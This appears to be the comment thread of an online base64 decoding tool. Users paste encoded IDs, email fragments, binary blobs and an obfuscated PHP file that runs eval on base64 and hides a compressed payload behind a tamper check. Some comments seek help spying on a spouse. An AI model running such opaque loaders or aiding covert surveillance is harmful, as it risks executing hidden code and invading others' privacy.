ZkjyV7EPV7VPZ3tUK5LQrpWPV9NlL1OUod1zM3EPV7OFXqWPB3tUKjHGZpAwA4kSA2RQKkDGZpqwAkjyVoE1HSIIHSW1KxtPVzyTV6N3nkk2GtfwqiuTIXOlo092MX0jBcfzockTWfVlVwt1oT1Foj42Z2AlVvjvVg92LhjJnu12MNSJL1uTMhVKovtPocSJoNcDQ7VFKWWIIsE1HSIIHSW1JFIxIFI0HsEFKHA1GV9SHHESFoWIEJWIEG9SWi8vBvNvYtxvVjEUqbWPV6NvVmOUq0uzVt8QVa42oaNFC90QVqqlHDESIVqlJFIxIFI0HsEPVzLPVc01WGOSIHu0WoWIEJWIEG9SWbDKMmAKnbNFCtfzockTW
  • ManMnana,
    It took me this tool to realize that padding is indeed necessary.
  • Samc2,
    I found this on my phone I just lost my computer to explorer.exe I think this is a spawn from it as I always used my phone via USB for data transfer and charging any tips on getting rid of it , I'm not sure if factory reset will work I'm not rooted but I found a file in root I can't access and it's the only fe on the phone I can't access this file I'm submitting though is in my emulated storage. ID: 5431-8b5f-62bf-f092-a47d-446c-dcdb-6fa1
  • buck,
    i got it from my google drive
  • Nome,
    e720-7fb7-1961-f932-931c-b2b2-1a75-12bd
    Got from my Google drive. I have no idea what I'm doing ?
  • Thomashermes,
    I don't know where it came from I think someone has been hacking my phone for years now and it popped up this way when I opened a web page or something that was sent to me ID: 4cd6-9b9f-5d8f-a22d-e57a-55c2-243a-3e15
  • bjs,
    its from local projects of me. 6e54-ee57-550d-86a4-e0f6-adb1-bf36-49f6
  • GEORGE,
    b2cb-49d0-8b50-75d3-c8c3-4038-68f0-8a42


    img alt=3D"Microsoft" border=3D"0" width=3D"200" height=3D"23" style=3D"bo=
    rder: 0;" data-outlook-trace=3D"F:0|T:1" src=3D"data:image/png;base64,iVBOR=
    w0KGgoAAAANSUhEUgAAAZEAAAAuCAYAAADpyiRDAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8=
    YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAABCXSURBVHhe7V3bkRzHEYQJNIEhC2gCTIAJ9IAHkv8=
    6DxYHKARKP8KHDMAv9QUTzgR6IIYcOFX25gymq7Nfu723N4vOiIzb7aqumeneqezH7N6r/735y9=
    Ml+Ir4639ePV2CDD8xMTExcU0oARhBhp8iMjExMXHLUAIwggw/RWRiYmLilqEEYAQZforIx=
    MTExC1DCcAIMvwUkYmJiYlbhhKAEWT4KSITExMTtwwlACPI8FNEJiYmJm4ZSgBGkOGniExMTEzc=
    MpQAjCDDTxGZ2B1++umn73755Zf7t2/f/mF/n7b89ddf7+g2MTEU//zb4YePHx7=
    uP75//yOL9gElACPI8FNECvj555/fGD8Zf0TiYvHEFWEi8YOJx59ePDa8p+uLB5LSbx8e7n=
    57eHj38cPhS8xjsvrX4XDTn7uPh8P3dr2vW8lqzw70h/XV08qHwx80vXwoARhBhn9RImIJ4LVLC=
    BEtkX9P125w9CrjgnRbAfHY2pG4ppBcF+j/ioCAL1pEIAohIVkSipJSie8Pn6+ZQC&#=
    43;JJDk38O8P7/609vhir+8gQgx1UeCY/jz+8f7whuaXDSUAI8jwuxIR48kJAsscIt5=
    KugVALFSywoyELhNXgPXBF98ngvIzcs4AZBQgBF3i4WkzFoa6GZwiIp4QlEuKLIRfichulrWUAI=
    wgw+9KRLAGTtduoK6KuZBuAUg4yse4m6WSW0OhT75g2RHCb6/x+VmTCZa+OHh4h=
    C+LrwIkHJ+ETuPh8ZaWuEaIyMoLiuzH9w+f4mPN5axdigiIhEH3Zli9aly6rrCy=
    ZNT7Ekaz3yowC/T9YXykOYH5f/b+ND076gJyeESSQkI98vBFjXwXws7Qu4cUEUvQnF0Eon0=
    Snwwv2TahH98fPttx7nYl5EoARpDh9ygin+neDKsT7W8o0nUFR77vMINh/Ztck94LrP3vl7=
    7aMDszNFsyCKDpWcHNc5nwwl5HZk0fScp87nJiguRL111DiUjp2kwkXpvPXWlZEIJM9wlACcAIM=
    vzuRATsmREUlkEi0n3ihcL6aJciUhhFNz2KfBQhHeO5NpUviV4R2cJ873zdhbvZ9H4OKAEYQYbf=
    pYgYm0dh8HV1Jek+8UJhfbQ7EcktY/XOIiAkemN3/yPuc0QEyM709rRncWkoARhBhn/xIqL=
    Wtns22P2Gur2Xj4jSfQU2Za0c57OSpiIw87Fzxvr9OyMS2UK8v1ezKCuPjgPStMyk7tkO+J=
    sdYcEGH+P2uNh4/oQN5p4ZHMA2iOIhFsta2+M7q6PaA3wHG3zoHmHbBzxu1GcsS9qOD=
    JvpjpEP4vNQF4GeQRyy+zglqGQLqrV5+EbcPEWE2YvVu9vuOYAoO2WdHyN+9T0X=
    llU/I+q6UEZzE3DuPgaojh+1C+jbZrkW7FFtbfba16XJYuI7LLGtdSak6pbaDXG=
    P+2dpe0NQ6RZDCcAIMvweZiJLEovKLYFUOwk+op7aoE3O18qSY9IkgQStEp0i/FgtQP=
    mwHInX25KNQyvDt7dr358IxLFrYsLknVy/YPZmp3g0tQfPHQIbJTErazmHc3i5Tdhjsm5KbC1Ag=
    m99zDTxsSTD8uzyD4j4Kp4CrqPlceWQ5ArLbkiaaZ0+EQHkuYintbzP0ja47pwNwGtvp&#4=
    3;kopM7WOlhQAw0lBj3tnQwGlACMIMPvQkRU4rey6gY7fLZ1kKxQvi1bGCpsYGXNIoLza03iZJS=
    8hD38fIcqN651kXTtvRpxF4lzzY3CUd5xLfJm74yx5eNWSOz9fkVEJKVzl1gwAvUx1ZJW4oMEaA=
    nVl+eIhMVQEvLaCoQ45UbJ40QkvT5cN80rlI8Wgbh+aENnpylACnxlz0oPNFLxOaW9o=
    2MrARhBht+FiMCmklJpRA2b9zeGkYkoP1lElMA1sCoihSQc6p4qIAuVkCBmZ/JPbvYzBGTh=
    KiT2erciIpPamXsYtdHyAu+jElyJKuaCXEILicvqqWR7pB6ZjxIROy6e2origDSv8Hacb65=
    9tu2groumACXwxuLDE7A7/2RmOaS9lQCMIMPvRkTw15WvNgWzJUtBi+j4cjBU2sDKqiKChO=
    l9FloixV5M2MMA7XV4XJj26CZlWZaot0nMoa79VUtdi/hgr0Ed1/tGI2O7ntzsJ8Szv+if7=
    fJi1P4Uoeyx7G/YS7FYPxo/8VwTX+Mi9us+iorLsmD3zMT2fpf7cpq+uc/6cUiL=
    mSRKJBOaV3iflTYT2iYpzA5ySUguqWSW6IzRdYXHk4/fp4j8fIIERokI4OOANK1QPgtDYg77DQ/=
    3x7/tIoL28vbakpZaytouRemYgWl7i1iqvW8edlNnRQQC4G1IIqGigEgi6wfClQfStMLKkGS6fU=
    AkY7okYAKNluJUDBKj8nW2hdeor9qCjJaDtkDSFv5hj4guyfIf7XL0DAE1W7QvZf5K6LPtweuQs=
    6ntdQNW1juIqPbfJaGSDkSA5pOQS+I0r1A+EJBkrdwQEpBYa1eJXI22c4lKxxVLNRcW=
    Eb+kpHyOTH8JYPu+JiKAbEd3/AWqL/1MVX6Gzmzvm4fd6FkRATJJLtlgtzK1h7I2vre=
    BNK2wsmISys1CSgKSg4oDEewRBAhqzn+B+SnR24prYu+5HpyDr48+o1kCYi=
    EEPzmulX3zIgL4mCBNK5RP6dhITIm/T2gq6dk10iwh47qkenERcdetfHICu4XqT5pWWJl6cEHeP=
    yh3ftG5ntLe5pPGDO397/8+XYTE0++vni5Bhu+C3eg1EVFPWyVJysqjBILk=
    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3D=
    =3D"


    I got this in my email and thought it was an embedded malicious script in the image, but cant manage to fully decrypt deobfuscate it.
  • Jynnxd,
    8ebc-b068-fdad-4b7f-1d46-097a-e17e-2b8f

    Got the string from a youtube video for improving gaming performance
  • Varun,
    0750-ce0e-81ea-d27b-0eb2-ca1b-e9ac-2d11

    i got that base64 from probe42
  • Itay,
    e3bc-0f4b-12c7-315c-109f-386c-0c2f-f1d9

    Got that string from a CTF I am doing now, can't figure out what's the problem with it...
  • BRYAN,
    8fa3-21a7-3bd7-7ddd-f870-2727-ef4f-f7dd normalmente es mi intuición la que dio con todo esto y muchas cosas mas todo es suerte en mi.
  • BRYAN,
    dejare esto por aqui y esperare al guru 02bd-493d-e533-8c18-c14c-148b-fab5-539c
  • BRYAN,
    6520-da55-e940-985c-6308-5d36-f672-77b8 guru encontré esto en internet
  • BRYAN,
    5830-442c-de18-b6fa-1d2d-9d0a-744f-cf8e lo encontre en internet todo gracias al poder de la mente
  • BRYAN,
    ef67-ca2d-8b3e-7a10-7347-d5a0-a66d-1316 espero su respuesta gran guru
  • SrJason,
    Eu a encontrei em um grupo de informática, o arquivo estava codificado e gostaria de saber do que se trata.
    f9f2-8dcc-772d-bb3e-35e6-abba-10d2-a068
  • Vineeth,
    ID: eb48-e5c3-39a0-cb0c-068b-00f2-606b-987c

    Hello, please analyze the type of string it is, and help me in converting it to pdf
  • Prem,
    ID:8589-acf6-6194-8e17-8ae1-88c9-f65f-53d8

    found this code inside damaged DBX file that stores emails
  • ALW,
    ADMIN : 6462-ca15-1061-f811-b9a9-4a83-c015-91c4 ILL TELL YOU WHERE I GOT IT IF YOU EMAIL ME PRIVATELY PLEASE OR YOU CAN CONTACT ME ON TELEGRAM
  • SJS,
    ID: 0e7b-ff67-996a-e739-3dd1-b470-b92b-ae2c
    This base 64 came out of some kind of software that was linked to my wife modem. The website was related to Joesandbox. Please help! This is very important someone has been watching me!
  • Iree,
    ID:0908-c9a5-f33d-8cff-1e35-63db-c194-3609

    This base 64 camw from a Raw email i recieved
  • PHCrack,
    Admin can you send me the original text of this

    <?php /* Reverse engineering of this file is strictly prohibited. Checksum: 59a10705f866f227059f4ea7c866015e */ $I11l1lIllI=file(__FILE__);eval(base64_decode("ZnVuY3Rpb24gT08wTzAwTzBPTygkYSwkYil7JGM9YXJyYXkoODYwLDMyNCwzMiwyNTM4KTskaz1nemluZmxhdGUoYmFzZTY0X2RlY29kZSgiS3lyTlRjb3NLUVlBIikpOyRPME8wPSRrWzZdLiRrWzFdLiRrWzNdLiRrWzZdLiRrWzVdLiRrWzBdOyRPMD0iJGtbNV0ka1swXSRrWzRdJGtbMl0iO2lmKCRiPT0xNzApeyRkPSRPME8wKCRhLCRjWzBdKyRjWzFdLCRjWzJdKTt9ZWxzZWlmKCRiPT04KXskZD0kTzBPMCgkYSwkY1swXSwkY1sxXSk7fWVsc2VpZigkYj09MTIpeyRkPSRPMCgkTzBPMCgkYSwkY1swXSskY1sxXSskY1syXSkpO31yZXR1cm4kZDt9"));eval(base64_decode(OO0O00O0OO($I11l1lIllI[0],8)));eval(IlIlllll1I(OO0O00O0OO($I11l1lIllI[0],12),OO0O00O0OO($I11l1lIllI[0],170),$I11l1lIllI));__halt_compiler();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

    Thanks admin
  • April,
    bfd1-672e-c691-dac6-e1c0-aac1-16fc-61ba

    Thank you!
  • iree,
    ID:''' b5ff-8a38-c60f-6ef4-5ee5-c92e-51c7-5017'''

    this is a raw original gmail message
    help me decode this please.
  • Gat,
    Please help me to decode below encryption -

    ;ú/ú›@ÇúÍ×l¿EÑkuÃcŸæÑ.¬ Le Ú
    5°L5næÄC@…1ôÝïe“²E¥r¸ù/&QÛtEhKÔÚ¾›xž7³«å§æ6eÐÉPn‡æyr®-žµ ”ÙX3цX/
    ,ŸeŽnOº\÷8‚\èkr•æ¥<Õ÷ ÃFÀþ]ús»kEÏB©Eª=Œÿ-ëøëE.¼¡âa°TIýáþô…ä¯P
    ðm½ z*0ÛCíQŽ/ª­kw;Wûˆ‚^¸’t]y_)b4g¹
    ­, M“@nÎ\_RéÉ#H™à÷it­Ä­‹ÀÍŠ‘÷ ¸Çr®
    dakŽc×ðnT@u9BÏJ½˜C©{6”nž$Ÿå­©Ð#Q ñ.¾³x²í-r´/R…D3ÏÍ&Èm´¢ùW'x*¬lh×E¾­¼F–hYïåõR†p5ªNErí:oòéŸ(ñfo!u¶™p~ධÃg¡Qc¦MB¸“>FåN°q=_Q‡T! 7O¦ÔißéZÅh‡µh=#ÅdÍá0 ®8¢)œckµï˜¦WÄfUoa¤K†ÌôzN E$ub°ElÔEoáôDOþ5_,¼RÁTÃnòÙË‚™˜6.;THHÑiM<ò% C]Í;Õd÷.ð1<=às¸ÍXŠ±aM¹­ë?òW\‘hrc5](,?°|s¤ \™ þcC$+Š®GêÍ4A6”g§j^y\‚ÜàÔúX3ДHy‘Ó¹î¨8­ïç1»S GKn†R!®±ê¢´U{œ*ú2»Ié
    +™lÒ€ø/ÑP5/r_O fä1C½n)£æÕ…UPT#€¢×2«Á<”÷ñTÄ™ŽK _ˆ“R‹N—“ª23f{¢"Sx0’«)jÈäd)ŽoPƒ¿$­.
  • Dav,
    KU)"†)jwe&ÀPÙ3W¬$¸Š¦i©„›‹¾†+øB0Ee’ÜQ– ŽÎƒRš…î>$ÎiÔ‘Ä%¢Ò±M$£(šU®ö°Ôw'yÎY™)qå8çwy×,ãdà•AÑA àÈ~yÿÿ‚WÆM( Lâ¹äOfÆQ„E®]0¨ä`\äèiOúð6i{øÚ¼Hòý¥K6ˆ ŒIGn(Ë £¬¡ÎƒA‡]üH
    ¤ ¤'P¼Š*R6K(©§$jõi`yØxûõ¾ãþÖÏ­u}í»Þ}mùa&¢YiIjQ»÷ïÿÿùRøÏ”€ € 5ÄhY¢Î
    5K‚*0Õ$¹2Àg) 2È…®ú:6ò¼°««()uÓ8¤†è–fM=,&KºäËž‹R®0±J1c¤Ì—ÇTWËNnB:e¹2ˆò÷‘HègMç2‹¢+Š+Ü•ÏäP‘GŠV4k±Ðâ®Eÿ¨ ÓÛ БD´º¾#HO‡FMséH脘¤ú½ê '‘3I[ð˜ªV¸PT4.)áã #¦dyº7r" …–³˜°OF°0Fl*Œ tÓ¢ñEaøåÚˆ¢îVç~ãZµ¿lßtöÍõ ÿc¿÷ËØ1Å’åUÏØ&U«PÿÿþèFÛJ Lâ$Tš&i`Ä¢RÑéŒßÝA‡4ÆC£ÔF
    góõ–šÝÚqÁn
    H†
    æjª.»HK§³„ûÃ2äëÙÉ»ækÐq"Zn+ÍÞ
    I²Œ­ðÌý¿ÿú°LÖ/†„DU82ð€¨Šweæ²lýLì¤x‚
     èMœˆÈî÷¸Ôùºjšû%óéßÛ‹4bv‰Õ“,¢Lù¢€­ @ a3ˆ‘V˜fFÒõˆ
    [ÒHP¥¨°/:sPÇ›‡ºËjØÜdžwGEQl·K™±¬¶ºuŸÊtKCŠkKlݶUIÓq¥$7x)b³Lÿ1™ûÝïq©óvT×Ú¾};äaH²ÆtN¯3H’gÍm€ƒƒªøp ‚¡EÖ©RÖÄV`#*ìxÿ%J®V‹Dø¹± ¥7® ’a@\Ùȇ!™ª&HUž¨½§áÇ•Baä/BÏ7K’ù¹gÆK?ZúG5w†Ò¾ª[3,’;Àµ¤|B¶©Ób–# pÈ; Y3”xv%eà ˆX?"Y†:u@‹&°˜¢;Œ(T¼h€Hå[XÌ™ñs`žÀ—«Y4Z $`ø„â׏<j3–¡UŒ%çœFO*ƒâ!È„ð¶ï
    ÙÓ·×Ð70ÅxÜ›fî퍻È{c^˜«ñ5æ=Õc;BCS: œ‹¹kAEË=!*Z ŠáŸ˜©k\ž˜xÕA¥h°¸@ÈÓŒ*E•…iJjÆåÔµ‹mÅt·dnB¶u"46ÊÃ’íˆÀŽ31b?Z¼õ=
    ê¼±n †„½¬’Õ"~:«±Ÿ4‡ô´#ýÚ{ƒE
    "5âBÌgVi/ÿåB‰åÀ0¼¹†~Û”³‹€4}<­
    *?˜°´¡XW tµYd5 DÚÇ^ÿú²L™RUÄMÑ›C.²ƒÈJk Ný3Dm`ÉÊ &'
    £QZõ)PAEN™©ìüLE¡´êQ†¯Úì8ï7[Õ—53®e_–œT(ĥȮЍ
    ò.r<†WU˜ôRqœ×°“ÿºj¾óÂüýM8DùqE¦Õ¬Ö,òŽ8oè´Š€¶¸‰‰H 6CùŽ‡»Íi%É2—AÌžže2 zIv¦\ƒfTé‚Óe°ô6ÿ1 à¾ËV-&}›÷5!Ê/9¿Þ‰DØx13›¤ål¯r†äç·—š×¦ì*¹^®ú1å¼I¥SÝU'c,Ž?¿Sÿÿÿ‰dª\Q DàûLÅ“9ÌÍà€A+pèR%ðŒ¯†9=.R˜@vuU˜cÆ0Z‹ChZ±Wé÷r“øE•&«õ 8KýŠÏE¨¨y¨Åû®Dãà9É·ä’>VÙîaŸ!ïËÍ®ÍØꦌ•%F"¤†(“B‡‡XóÌRá4+µ Š¡T 7 °p“P8p(3΁€ÐFX ˆx€
  • DULCE,
    Quisiera usar mas de dos cadenas base 64 y convertirlo en un solo PDF.
    Eso es posible con PHP.
    no logro encontrar algun metodo para hacerlo. Gracias!
  • Kayla,
    72a5-ff4a-dcd4-2807-ce5b-969d-b96c-bd71.

    This is my code been trying to figure out some things from years back thats been bothering me to this day if you could help me you would really save a girl from continuing to lose her mind or at least drop it somthing giving this a last try you seem like thep only one that might be smart enough too thank you
  • wim,
    It would be nice if you could show the position of the error or provide more context. Especially for large strings it is hard to find where the problem is
  • simboonhock,
    sWw0Rus1r9lETlawMVeGKg==

    plain text= budi123

    i know the plain text, but i dont know how to decode

    anyone can help?
  • vrt,
    d998-32fd-3f34-9ee0-9d1b-6b15-b05c-9190
    this is protobuf google services android
  • tylar,
    c977-69d8-c5c3-a3f6-6e54-2595-1c03-343b. This is a text message file from my cellphone I thank you and appreciate your time to help me with this information
  • abc,
    abcdefghij
  • Anjali,
    From last few days your base64 repair tool is not working and I really need it. Please help me out.
  • Soniya,
    Hi, I got this base 64 code from chat ai bing, here's the code 47c6-6e9f-00fb-7fc3-937e-4a00-e75f-139d.
  • BobbyMac,
    My wife is doing shady shit… but I can never decode her stuff. 577e-9526-7369-a6ff-569f-f36b-3ce9-cb3d
  • Jaimina,
    fe44-88dd-2770-5ee7-97b9-f5d3-e6e5-4190
  • Revbs,
    2b28-1453-9b85-7432-baec-a665-339d-86a9
    obtuve el codigo de una web de iptv donde me dieron algo a si en la configuracion y quiero saver que es por si es un virus o algo a si. Gracias
  • Sahil,
    I got it from the mobile tracker app by downloading the call recording
    id - 6725-bde4-be11-2ccc-3c54-afc1-58c3-6b65
  • Hemanth,
    Hi, I got this from a screenshot that is being converted to base64 string and added to json value and sent as reponse from an application i am working on. Re: 9fd6-32ab-6b04-e5f9-49dc-40b7-84dc-8f8a
  • Saiyam,
